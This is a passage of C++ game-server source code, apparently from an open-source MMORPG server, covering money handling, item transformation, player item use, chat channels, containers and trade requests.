CONST_SLOT_WHEREEVER*/) { uint32_t remainderCount = 0; ReturnValue ret = internalAddItem(player, item, static_cast<int32_t>(slot), 0, false, remainderCount); if (remainderCount != 0) { Item* remainderItem = Item::CreateItem(item->getID(), remainderCount); ReturnValue remaindRet = internalAddItem(player->getTile(), remainderItem, INDEX_WHEREEVER, FLAG_NOLIMIT); if (remaindRet != RETURNVALUE_NOERROR) { ReleaseItem(remainderItem); } } if (ret != RETURNVALUE_NOERROR && dropOnMap) { ret = internalAddItem(player->getTile(), item, INDEX_WHEREEVER, FLAG_NOLIMIT); } return ret; } Item* Game::findItemOfType(Cylinder* cylinder, uint16_t itemId, bool depthSearch /*= true*/, int32_t subType /*= -1*/) const { if (cylinder == nullptr) { return nullptr; } std::vector<Container*> containers; for (size_t i = cylinder->getFirstIndex(), j = cylinder->getLastIndex(); i < j; ++i) { Thing* thing = cylinder->getThing(i); if (!thing) { continue; } Item* item = thing->getItem(); if (!item) { continue; } if (item->getID() == itemId && (subType == -1 || subType == item->getSubType())) { return item; } if (depthSearch) { Container* container = item->getContainer(); if (container) { containers.push_back(container); } } } size_t i = 0; while (i < containers.size()) { Container* container = containers[i++]; for (Item* item : container->getItemList()) { if (item->getID() == itemId && (subType == -1 || subType == item->getSubType())) { return item; } Container* subContainer = item->getContainer(); if (subContainer) { containers.push_back(subContainer); } } } return nullptr; } bool Game::removeMoney(Cylinder* cylinder, uint64_t money, uint32_t flags /*= 0*/) { if (cylinder == nullptr) { return false; } if (money == 0) { return true; } std::vector<Container*> containers; std::multimap<uint32_t, Item*> moneyMap; uint64_t moneyCount = 0; for (size_t i = cylinder->getFirstIndex(), j = cylinder->getLastIndex(); i < j; ++i) { Thing* thing = cylinder->getThing(i); if (!thing) { continue; } Item* item = thing->getItem(); if (!item) { continue; } Container* container = item->getContainer(); if (container) { containers.push_back(container); } else { const uint32_t worth = item->getWorth(); if (worth != 0) { moneyCount += worth; moneyMap.emplace(worth, item); } } } size_t i = 0; while (i < containers.size()) { Container* container = containers[i++]; for (Item* item : container->getItemList()) { Container* tmpContainer = item->getContainer(); if (tmpContainer) { containers.push_back(tmpContainer); } else { const uint32_t worth = item->getWorth(); if (worth != 0) { moneyCount += worth; moneyMap.emplace(worth, item); } } } } if (moneyCount < money) { return false; } for (const auto& moneyEntry : moneyMap) { Item* item = moneyEntry.second; if (moneyEntry.first < money) { internalRemoveItem(item); money -= moneyEntry.first; } else if (moneyEntry.first > money) { const uint32_t worth = moneyEntry.first / item->getItemCount(); const uint32_t removeCount = std::ceil(money / static_cast<double>(worth)); addMoney(cylinder, (worth * removeCount) - money, flags); internalRemoveItem(item, removeCount); break; } else { internalRemoveItem(item); break; } } return true; } void Game::addMoney(Cylinder* cylinder, uint64_t money, uint32_t flags /*= 0*/) { if (money == 0) { return; } uint32_t crystalCoins = money / 10000; money -= crystalCoins * 10000; while (crystalCoins > 0) { const uint16_t count = std::min<uint32_t>(100, crystalCoins); Item* remaindItem = Item::CreateItem(ITEM_CRYSTAL_COIN, count); ReturnValue ret = internalAddItem(cylinder, remaindItem, INDEX_WHEREEVER, flags); if (ret != RETURNVALUE_NOERROR) { internalAddItem(cylinder->getTile(), remaindItem, INDEX_WHEREEVER, FLAG_NOLIMIT); } crystalCoins -= count; } uint16_t platinumCoins = money / 100; if (platinumCoins != 0) { Item* remaindItem = Item::CreateItem(ITEM_PLATINUM_COIN, platinumCoins); ReturnValue ret = internalAddItem(cylinder, remaindItem, INDEX_WHEREEVER, flags); if (ret != RETURNVALUE_NOERROR) { internalAddItem(cylinder->getTile(), remaindItem, INDEX_WHEREEVER, FLAG_NOLIMIT); } money -= platinumCoins * 100; } if (money != 0) { Item* remaindItem = Item::CreateItem(ITEM_GOLD_COIN, money); ReturnValue ret = internalAddItem(cylinder, remaindItem, INDEX_WHEREEVER, flags); if (ret != RETURNVALUE_NOERROR) { internalAddItem(cylinder->getTile(), remaindItem, INDEX_WHEREEVER, FLAG_NOLIMIT); } } } Item* Game::transformItem(Item* item, uint16_t newId, int32_t newCount /*= -1*/) { if (item->getID() == newId && (newCount == -1 || (newCount == item->getSubType() && newCount != 0))) { //chargeless item placed on map = infinite return item; } Cylinder* cylinder = item->getParent(); if (cylinder == nullptr) { return nullptr; } Tile* fromTile = cylinder->getTile(); if (fromTile) { auto it = browseFields.find(fromTile); if (it != browseFields.end() && it->second == cylinder) { cylinder = fromTile; } } int32_t itemIndex = cylinder->getThingIndex(item); if (itemIndex == -1) { return item; } if (!item->canTransform()) { return item; } const ItemType& newType = Item::items[newId]; if (newType.id == 0) { return item; } const ItemType& curType = Item::items[item->getID()]; if (curType.alwaysOnTop != newType.alwaysOnTop) { //This only occurs when you transform items on tiles from a downItem to a topItem (or vice versa) //Remove the old, and add the new cylinder->removeThing(item, item->getItemCount()); cylinder->postRemoveNotification(item, cylinder, itemIndex); item->setID(newId); if (newCount != -1) { item->setSubType(newCount); } cylinder->addThing(item); Cylinder* newParent = item->getParent(); if (newParent == nullptr) { ReleaseItem(item); return nullptr; } newParent->postAddNotification(item, cylinder, newParent->getThingIndex(item)); return item; } if (curType.type == newType.type) { //Both items has the same type so we can safely change id/subtype if (newCount == 0 && (item->isStackable() || item->hasAttribute(ITEM_ATTRIBUTE_CHARGES))) { if (item->isStackable()) { internalRemoveItem(item); return nullptr; } else { int32_t newItemId = newId; if (curType.id == newType.id) { newItemId = item->getDecayTo(); } if (newItemId < 0) { internalRemoveItem(item); return nullptr; } else if (newItemId != newId) { //Replacing the the old item with the new while maintaining the old position Item* newItem = Item::CreateItem(newItemId, 1); if (newItem == nullptr) { return nullptr; } cylinder->replaceThing(itemIndex, newItem); cylinder->postAddNotification(newItem, cylinder, itemIndex); item->setParent(nullptr); cylinder->postRemoveNotification(item, cylinder, itemIndex); ReleaseItem(item); return newItem; } return transformItem(item, newItemId); } } else { cylinder->postRemoveNotification(item, cylinder, itemIndex); uint16_t itemId = item->getID(); int32_t count = item->getSubType(); if (curType.id != newType.id) { if (newType.group != curType.group) { item->setDefaultSubtype(); } itemId = newId; } if (newCount != -1 && newType.hasSubType()) { count = newCount; } cylinder->updateThing(item, itemId, count); cylinder->postAddNotification(item, cylinder, itemIndex); return item; } } //Replacing the old item with the new while maintaining the old position Item* newItem; if (newCount == -1) { newItem = Item::CreateItem(newId); } else { newItem = Item::CreateItem(newId, newCount); } if (newItem == nullptr) { return nullptr; } cylinder->replaceThing(itemIndex, newItem); cylinder->postAddNotification(newItem, cylinder, itemIndex); item->setParent(nullptr); cylinder->postRemoveNotification(item, cylinder, itemIndex); ReleaseItem(item); if (newItem->getDuration() > 0) { if (newItem->getDecaying() != DECAYING_TRUE) { newItem->incrementReferenceCounter(); newItem->setDecaying(DECAYING_TRUE); toDecayItems.push_front(newItem); } } return newItem; } ReturnValue Game::internalTeleport(Thing* thing, const Position& newPos, bool pushMove/* = true*/, uint32_t flags /*= 0*/) { if (newPos == thing->getPosition()) { return RETURNVALUE_NOERROR; } else if (thing->isRemoved()) { return RETURNVALUE_NOTPOSSIBLE; } Tile* toTile = map.getTile(newPos); if (!toTile) { return RETURNVALUE_NOTPOSSIBLE; } if (Creature* creature = thing->getCreature()) { ReturnValue ret = toTile->queryAdd(0, *creature, 1, FLAG_NOLIMIT); if (ret != RETURNVALUE_NOERROR) { return ret; } map.moveCreature(*creature, *toTile, !pushMove); return RETURNVALUE_NOERROR; } else if (Item* item = thing->getItem()) { return internalMoveItem(item->getParent(), toTile, INDEX_WHEREEVER, item, item->getItemCount(), nullptr, flags); } return RETURNVALUE_NOTPOSSIBLE; } Item* searchForItem(Container* container, uint16_t itemId) { for (ContainerIterator it = container->iterator(); it.hasNext(); it.advance()) { if ((*it)->getID() == itemId) { return *it; } } return nullptr; } slots_t getSlotType(const ItemType& it) { slots_t slot = CONST_SLOT_RIGHT; if (it.weaponType != WeaponType_t::WEAPON_SHIELD) { int32_t slotPosition = it.slotPosition; if (slotPosition & SLOTP_HEAD) { slot = CONST_SLOT_HEAD; } else if (slotPosition & SLOTP_NECKLACE) { slot = CONST_SLOT_NECKLACE; } else if (slotPosition & SLOTP_ARMOR) { slot = CONST_SLOT_ARMOR; } else if (slotPosition & SLOTP_LEGS) { slot = CONST_SLOT_LEGS; } else if (slotPosition & SLOTP_FEET) { slot = CONST_SLOT_FEET; } else if (slotPosition & SLOTP_RING) { slot = CONST_SLOT_RING; } else if (slotPosition & SLOTP_AMMO) { slot = CONST_SLOT_AMMO; } else if (slotPosition & SLOTP_TWO_HAND || slotPosition & SLOTP_LEFT) { slot = CONST_SLOT_LEFT; } } return slot; } //Implementation of player invoked events void Game::playerEquipItem(uint32_t playerId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Item* item = player->getInventoryItem(CONST_SLOT_BACKPACK); if (!item) { return; } Container* backpack = item->getContainer(); if (!backpack) { return; } const ItemType& it = Item::items.getItemIdByClientId(spriteId); slots_t slot = getSlotType(it); Item* slotItem = player->getInventoryItem(slot); Item* equipItem = searchForItem(backpack, it.id); if (slotItem && slotItem->getID() == it.id && (!it.stackable || slotItem->getItemCount() == 100 || !equipItem)) { internalMoveItem(slotItem->getParent(), player, CONST_SLOT_WHEREEVER, slotItem, slotItem->getItemCount(), nullptr); } else if (equipItem) { internalMoveItem(equipItem->getParent(), player, slot, equipItem, equipItem->getItemCount(), nullptr); } } void Game::playerMove(uint32_t playerId, Direction direction) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (player->isMovementBlocked()) { player->sendCancelWalk(); return; } player->resetIdleTime(); player->setNextWalkActionTask(nullptr); player->startAutoWalk(direction); } bool Game::playerBroadcastMessage(Player* player, const std::string& text) const { if (!player->hasFlag(PlayerFlag_CanBroadcast)) { return false; } std::cout << "> " << player->getName() << " broadcasted: \"" << text << "\"." << std::endl; for (const auto& it : players) { it.second->sendPrivateMessage(player, TALKTYPE_BROADCAST, text); } return true; } void Game::playerCreatePrivateChannel(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player || !player->isPremium()) { return; } ChatChannel* channel = g_chat->createChannel(*player, CHANNEL_PRIVATE); if (!channel || !channel->addUser(*player)) { return; } player->sendCreatePrivateChannel(channel->getId(), channel->getName()); } void Game::playerChannelInvite(uint32_t playerId, const std::string& name) { Player* player = getPlayerByID(playerId); if (!player) { return; } PrivateChatChannel* channel = g_chat->getPrivateChannel(*player); if (!channel) { return; } Player* invitePlayer = getPlayerByName(name); if (!invitePlayer) { return; } if (player == invitePlayer) { return; } channel->invitePlayer(*player, *invitePlayer); } void Game::playerChannelExclude(uint32_t playerId, const std::string& name) { Player* player = getPlayerByID(playerId); if (!player) { return; } PrivateChatChannel* channel = g_chat->getPrivateChannel(*player); if (!channel) { return; } Player* excludePlayer = getPlayerByName(name); if (!excludePlayer) { return; } if (player == excludePlayer) { return; } channel->excludePlayer(*player, *excludePlayer); } void Game::playerRequestChannels(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendChannelsDialog(); } void Game::playerOpenChannel(uint32_t playerId, uint16_t channelId) { Player* player = getPlayerByID(playerId); if (!player) { return; } ChatChannel* channel = g_chat->addUserToChannel(*player, channelId); if (!channel) { return; } const InvitedMap* invitedUsers = channel->getInvitedUsers(); const UsersMap* users; if (!channel->isPublicChannel()) { users = &channel->getUsers(); } else { users = nullptr; } player->sendChannel(channel->getId(), channel->getName(), users, invitedUsers); } void Game::playerCloseChannel(uint32_t playerId, uint16_t channelId) { Player* player = getPlayerByID(playerId); if (!player) { return; } g_chat->removeUserFromChannel(*player, channelId); } void Game::playerOpenPrivateChannel(uint32_t playerId, std::string& receiver) { Player* player = getPlayerByID(playerId); if (!player) { return; } if (!IOLoginData::formatPlayerName(receiver)) { player->sendCancelMessage("A player with this name does not exist."); return; } if (player->getName() == receiver) { player->sendCancelMessage("You cannot set up a private message channel with yourself."); return; } player->sendOpenPrivateChannel(receiver); } void Game::playerCloseNpcChannel(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } SpectatorVec spectators; map.getSpectators(spectators, player->getPosition()); for (Creature* spectator : spectators) { if (Npc* npc = spectator->getNpc()) { npc->onPlayerCloseChannel(player); } } } void Game::playerReceivePing(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->receivePing(); } void Game::playerReceivePingBack(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->sendPingBack(); } void Game::playerAutoWalk(uint32_t playerId, const std::vector<Direction>& listDir) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->resetIdleTime(); player->setNextWalkTask(nullptr); player->startAutoWalk(listDir); } void Game::playerStopAutoWalk(uint32_t playerId) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->stopWalk(); } void Game::playerUseItemEx(uint32_t playerId, const Position& fromPos, uint8_t fromStackPos, uint16_t fromSpriteId, const Position& toPos, uint8_t toStackPos, uint16_t toSpriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } bool isHotkey = (fromPos.x == 0xFFFF && fromPos.y == 0 && fromPos.z == 0); if (isHotkey && !g_config.getBoolean(ConfigManager::AIMBOT_HOTKEY_ENABLED)) { return; } Thing* thing = internalGetThing(player, fromPos, fromStackPos, fromSpriteId, STACKPOS_USEITEM); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* item = thing->getItem(); if (!item || !item->isUseable() || item->getClientID() != fromSpriteId) { player->sendCancelMessage(RETURNVALUE_CANNOTUSETHISOBJECT); return; } Position walkToPos = fromPos; ReturnValue ret = g_actions->canUse(player, fromPos); if (ret == RETURNVALUE_NOERROR) { ret = g_actions->canUse(player, toPos, item); if (ret == RETURNVALUE_TOOFARAWAY) { walkToPos = toPos; } } if (ret != RETURNVALUE_NOERROR) { if (ret == RETURNVALUE_TOOFARAWAY) { Position itemPos = fromPos; uint8_t itemStackPos = fromStackPos; if (fromPos.x != 0xFFFF && toPos.x != 0xFFFF && Position::areInRange<1, 1, 0>(fromPos, player->getPosition()) && !Position::areInRange<1, 1, 0>(fromPos, toPos)) { Item* moveItem = nullptr; ret = internalMoveItem(item->getParent(), player, INDEX_WHEREEVER, item, item->getItemCount(), &moveItem, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); return; } //changing the position since its now in the inventory of the player internalGetPosition(moveItem, itemPos, itemStackPos); } std::vector<Direction> listDir; if (player->getPathTo(walkToPos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerUseItemEx, this, playerId, itemPos, itemStackPos, fromSpriteId, toPos, toStackPos, toSpriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } player->sendCancelMessage(ret); return; } if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerUseItemEx, this, playerId, fromPos, fromStackPos, fromSpriteId, toPos, toStackPos, toSpriteId)); player->setNextActionTask(task); return; } player->resetIdleTime(); player->setNextActionTask(nullptr); g_actions->useItemEx(player, fromPos, toPos, toStackPos, item, isHotkey); } void Game::playerUseItem(uint32_t playerId, const Position& pos, uint8_t stackPos, uint8_t index, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } bool isHotkey = (pos.x == 0xFFFF && pos.y == 0 && pos.z == 0); if (isHotkey && !g_config.getBoolean(ConfigManager::AIMBOT_HOTKEY_ENABLED)) { return; } Thing* thing = internalGetThing(player, pos, stackPos, spriteId, STACKPOS_USEITEM); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* item = thing->getItem(); if (!item || item->isUseable() || item->getClientID() != spriteId) { player->sendCancelMessage(RETURNVALUE_CANNOTUSETHISOBJECT); return; } ReturnValue ret = g_actions->canUse(player, pos); if (ret != RETURNVALUE_NOERROR) { if (ret == RETURNVALUE_TOOFARAWAY) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerUseItem, this, playerId, pos, stackPos, index, spriteId)); player->setNextWalkActionTask(task); return; } ret = RETURNVALUE_THEREISNOWAY; } player->sendCancelMessage(ret); return; } if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerUseItem, this, playerId, pos, stackPos, index, spriteId)); player->setNextActionTask(task); return; } player->resetIdleTime(); player->setNextActionTask(nullptr); g_actions->useItem(player, pos, index, item, isHotkey); } void Game::playerUseWithCreature(uint32_t playerId, const Position& fromPos, uint8_t fromStackPos, uint32_t creatureId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Creature* creature = getCreatureByID(creatureId); if (!creature) { return; } if (!Position::areInRange<Map::maxClientViewportX - 1, Map::maxClientViewportY - 1, 0>(creature->getPosition(), player->getPosition())) { return; } bool isHotkey = (fromPos.x == 0xFFFF && fromPos.y == 0 && fromPos.z == 0); if (!g_config.getBoolean(ConfigManager::AIMBOT_HOTKEY_ENABLED)) { if (creature->getPlayer() || isHotkey) { player->sendCancelMessage(RETURNVALUE_DIRECTPLAYERSHOOT); return; } } Thing* thing = internalGetThing(player, fromPos, fromStackPos, spriteId, STACKPOS_USEITEM); if (!thing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* item = thing->getItem(); if (!item || !item->isUseable() || item->getClientID() != spriteId) { player->sendCancelMessage(RETURNVALUE_CANNOTUSETHISOBJECT); return; } Position toPos = creature->getPosition(); Position walkToPos = fromPos; ReturnValue ret = g_actions->canUse(player, fromPos); if (ret == RETURNVALUE_NOERROR) { ret = g_actions->canUse(player, toPos, item); if (ret == RETURNVALUE_TOOFARAWAY) { walkToPos = toPos; } } if (ret != RETURNVALUE_NOERROR) { if (ret == RETURNVALUE_TOOFARAWAY) { Position itemPos = fromPos; uint8_t itemStackPos = fromStackPos; if (fromPos.x != 0xFFFF && Position::areInRange<1, 1, 0>(fromPos, player->getPosition()) && !Position::areInRange<1, 1, 0>(fromPos, toPos)) { Item* moveItem = nullptr; ret = internalMoveItem(item->getParent(), player, INDEX_WHEREEVER, item, item->getItemCount(), &moveItem, 0, player, nullptr, &fromPos, &toPos); if (ret != RETURNVALUE_NOERROR) { player->sendCancelMessage(ret); return; } //changing the position since its now in the inventory of the player internalGetPosition(moveItem, itemPos, itemStackPos); } std::vector<Direction> listDir; if (player->getPathTo(walkToPos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerUseWithCreature, this, playerId, itemPos, itemStackPos, creatureId, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } player->sendCancelMessage(ret); return; } if (!player->canDoAction()) { uint32_t delay = player->getNextActionTime(); SchedulerTask* task = createSchedulerTask(delay, std::bind(&Game::playerUseWithCreature, this, playerId, fromPos, fromStackPos, creatureId, spriteId)); player->setNextActionTask(task); return; } player->resetIdleTime(); player->setNextActionTask(nullptr); g_actions->useItemEx(player, fromPos, creature->getPosition(), creature->getParent()->getThingIndex(creature), item, isHotkey, creature); } void Game::playerCloseContainer(uint32_t playerId, uint8_t cid) { Player* player = getPlayerByID(playerId); if (!player) { return; } player->closeContainer(cid); player->sendCloseContainer(cid); } void Game::playerMoveUpContainer(uint32_t playerId, uint8_t cid) { Player* player = getPlayerByID(playerId); if (!player) { return; } Container* container = player->getContainerByID(cid); if (!container) { return; } Container* parentContainer = dynamic_cast<Container*>(container->getRealParent()); if (!parentContainer) { Tile* tile = container->getTile(); if (!tile) { return; } if (!g_events->eventPlayerOnBrowseField(player, tile->getPosition())) { return; } auto it = browseFields.find(tile); if (it == browseFields.end()) { parentContainer = new Container(tile); parentContainer->incrementReferenceCounter(); browseFields[tile] = parentContainer; g_scheduler.addEvent(createSchedulerTask(30000, std::bind(&Game::decreaseBrowseFieldRef, this, tile->getPosition()))); } else { parentContainer = it->second; } } player->addContainer(cid, parentContainer); player->sendContainer(cid, parentContainer, parentContainer->hasParent(), player->getContainerIndex(cid)); } void Game::playerUpdateContainer(uint32_t playerId, uint8_t cid) { Player* player = getPlayerByID(playerId); if (!player) { return; } Container* container = player->getContainerByID(cid); if (!container) { return; } player->sendContainer(cid, container, container->hasParent(), player->getContainerIndex(cid)); } void Game::playerRotateItem(uint32_t playerId, const Position& pos, uint8_t stackPos, const uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Thing* thing = internalGetThing(player, pos, stackPos, 0, STACKPOS_TOPDOWN_ITEM); if (!thing) { return; } Item* item = thing->getItem(); if (!item || item->getClientID() != spriteId || !item->isRotatable() || item->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (pos.x != 0xFFFF && !Position::areInRange<1, 1, 0>(pos, player->getPosition())) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerRotateItem, this, playerId, pos, stackPos, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } uint16_t newId = Item::items[item->getID()].rotateTo; if (newId != 0) { transformItem(item, newId); } } void Game::playerWriteItem(uint32_t playerId, uint32_t windowTextId, const std::string& text) { Player* player = getPlayerByID(playerId); if (!player) { return; } uint16_t maxTextLength = 0; uint32_t internalWindowTextId = 0; Item* writeItem = player->getWriteItem(internalWindowTextId, maxTextLength); if (text.length() > maxTextLength || windowTextId != internalWindowTextId) { return; } if (!writeItem || writeItem->isRemoved()) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Cylinder* topParent = writeItem->getTopParent(); Player* owner = dynamic_cast<Player*>(topParent); if (owner && owner != player) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (!Position::areInRange<1, 1, 0>(writeItem->getPosition(), player->getPosition())) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } for (auto creatureEvent : player->getCreatureEvents(CREATURE_EVENT_TEXTEDIT)) { if (!creatureEvent->executeTextEdit(player, writeItem, text)) { player->setWriteItem(nullptr); return; } } if (!text.empty()) { if (writeItem->getText() != text) { writeItem->setText(text); writeItem->setWriter(player->getName()); writeItem->setDate(time(nullptr)); } } else { writeItem->resetText(); writeItem->resetWriter(); writeItem->resetDate(); } uint16_t newId = Item::items[writeItem->getID()].writeOnceItemId; if (newId != 0) { transformItem(writeItem, newId); } player->setWriteItem(nullptr); } void Game::playerBrowseField(uint32_t playerId, const Position& pos) { Player* player = getPlayerByID(playerId); if (!player) { return; } const Position& playerPos = player->getPosition(); if (playerPos.z != pos.z) { player->sendCancelMessage(playerPos.z > pos.z ? RETURNVALUE_FIRSTGOUPSTAIRS : RETURNVALUE_FIRSTGODOWNSTAIRS); return; } if (!Position::areInRange<1, 1>(playerPos, pos)) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind( &Game::playerBrowseField, this, playerId, pos )); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } Tile* tile = map.getTile(pos); if (!tile) { return; } if (!g_events->eventPlayerOnBrowseField(player, pos)) { return; } Container* container; auto it = browseFields.find(tile); if (it == browseFields.end()) { container = new Container(tile); container->incrementReferenceCounter(); browseFields[tile] = container; g_scheduler.addEvent(createSchedulerTask(30000, std::bind(&Game::decreaseBrowseFieldRef, this, tile->getPosition()))); } else { container = it->second; } uint8_t dummyContainerId = 0xF - ((pos.x % 3) * 3 + (pos.y % 3)); Container* openContainer = player->getContainerByID(dummyContainerId); if (openContainer) { player->onCloseContainer(openContainer); player->closeContainer(dummyContainerId); } else { player->addContainer(dummyContainerId, container); player->sendContainer(dummyContainerId, container, false, 0); } } void Game::playerSeekInContainer(uint32_t playerId, uint8_t containerId, uint16_t index) { Player* player = getPlayerByID(playerId); if (!player) { return; } Container* container = player->getContainerByID(containerId); if (!container || !container->hasPagination()) { return; } if ((index % container->capacity()) != 0 || index >= container->size()) { return; } player->setContainerIndex(containerId, index); player->sendContainer(containerId, container, container->hasParent(), index); } void Game::playerUpdateHouseWindow(uint32_t playerId, uint8_t listId, uint32_t windowTextId, const std::string& text) { Player* player = getPlayerByID(playerId); if (!player) { return; } uint32_t internalWindowTextId; uint32_t internalListId; House* house = player->getEditHouse(internalWindowTextId, internalListId); if (house && house->canEditAccessList(internalListId, player) && internalWindowTextId == windowTextId && listId == 0) { house->setAccessList(internalListId, text); } player->setEditHouse(nullptr); } void Game::playerWrapItem(uint32_t playerId, const Position& position, uint8_t stackPos, const uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Thing* thing = internalGetThing(player, position, stackPos, 0, STACKPOS_TOPDOWN_ITEM); if (!thing) { return; } Item* item = thing->getItem(); if (!item || item->getClientID() != spriteId || !item->hasAttribute(ITEM_ATTRIBUTE_WRAPID) || item->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (position.x != 0xFFFF && !Position::areInRange<1, 1, 0>(position, player->getPosition())) { std::vector<Direction> listDir; if (player->getPathTo(position, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerWrapItem, this, playerId, position, stackPos, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } g_events->eventPlayerOnWrapItem(player, item); } void Game::playerRequestTrade(uint32_t playerId, const Position& pos, uint8_t stackPos, uint32_t tradePlayerId, uint16_t spriteId) { Player* player = getPlayerByID(playerId); if (!player) { return; } Player* tradePartner = getPlayerByID(tradePlayerId); if (!tradePartner || tradePartner == player) { player->sendCancelMessage("Select a player to trade with."); return; } if (!Position::areInRange<2, 2, 0>(tradePartner->getPosition(), player->getPosition())) { player->sendCancelMessage(RETURNVALUE_DESTINATIONOUTOFREACH); return; } if (!canThrowObjectTo(tradePartner->getPosition(), player->getPosition(), true, true)) { player->sendCancelMessage(RETURNVALUE_CANNOTTHROW); return; } Thing* tradeThing = internalGetThing(player, pos, stackPos, 0, STACKPOS_TOPDOWN_ITEM); if (!tradeThing) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } Item* tradeItem = tradeThing->getItem(); if (tradeItem->getClientID() != spriteId || !tradeItem->isPickupable() || tradeItem->hasAttribute(ITEM_ATTRIBUTE_UNIQUEID)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } if (g_config.getBoolean(ConfigManager::ONLY_INVITED_CAN_MOVE_HOUSE_ITEMS)) { if (HouseTile* houseTile = dynamic_cast<HouseTile*>(tradeItem->getTile())) { House* house = houseTile->getHouse(); if (house && !house->isInvited(player)) { player->sendCancelMessage(RETURNVALUE_NOTPOSSIBLE); return; } } } const Position& playerPosition = player->getPosition(); const Position& tradeItemPosition = tradeItem->getPosition(); if (playerPosition.z != tradeItemPosition.z) { player->sendCancelMessage(playerPosition.z > tradeItemPosition.z ? RETURNVALUE_FIRSTGOUPSTAIRS : RETURNVALUE_FIRSTGODOWNSTAIRS); return; } if (!Position::areInRange<1, 1>(tradeItemPosition, playerPosition)) { std::vector<Direction> listDir; if (player->getPathTo(pos, listDir, 0, 1, true, true)) { g_dispatcher.addTask(createTask(std::bind(&Game::playerAutoWalk, this, player->getID(), std::move(listDir)))); SchedulerTask* task = createSchedulerTask(400, std::bind(&Game::playerRequestTrade, this, playerId, pos, stackPos, tradePlayerId, spriteId)); player->setNextWalkActionTask(task); } else { player->sendCancelMessage(RETURNVALUE_THEREISNOWAY); } return; } Container* tradeItemContainer = tradeItem->getContainer(); if (tradeItemContainer) { for (const auto& it : tradeItems) { Item* item = it.first; if (tradeItem == item) { player->sendCancelMessage("This item is already being traded."); return; } if (tradeItemContainer->isHoldingItem(item)) { player->sendCancelMessage("This item is already being traded."); return; } Container* container = item->getContainer(); if (container && container->isHoldingItem(tradeItem)) { player->sendCancelMessage("This item is already being traded."); return; } } } else { for (const auto& it : tradeItems) { Item* item = it.first; if (tradeItem == item) { player->sendCancelMessage("This item is already being traded."); return; } Container* container = item->getContainer(); if (container && container->isHoldingItem(tradeItem)) { player->sendCancelMessage("This item is already being traded."); return; } } } Container* tradeContainer = tradeItem->getContainer(); if (tradeContainer && tradeContainer->getItemHoldingCount() + 1 > 100) { player->sendCancelMessage("You can only trade up to 100 objects at once."); return; } if (!g_events->eventPlayerOnTradeRequest(player, tradePartner, tradeItem)) { return; } internalStartTrade(player, tradePartner, tradeItem); } bool Game::internalStartTrade(Player* player, Player* tradePartner, Item* tradeItem) { if (player->tradeState != TRADE_NONE && !(player->tradeState == TRADE_ACKNOWLEDGE && player->tradePartner == tradePartner)) { player->sendCancelMessage(RETURNVALUE_YOUAREALREADYTRADING); return false; } else if (tradePartner->tradeState != 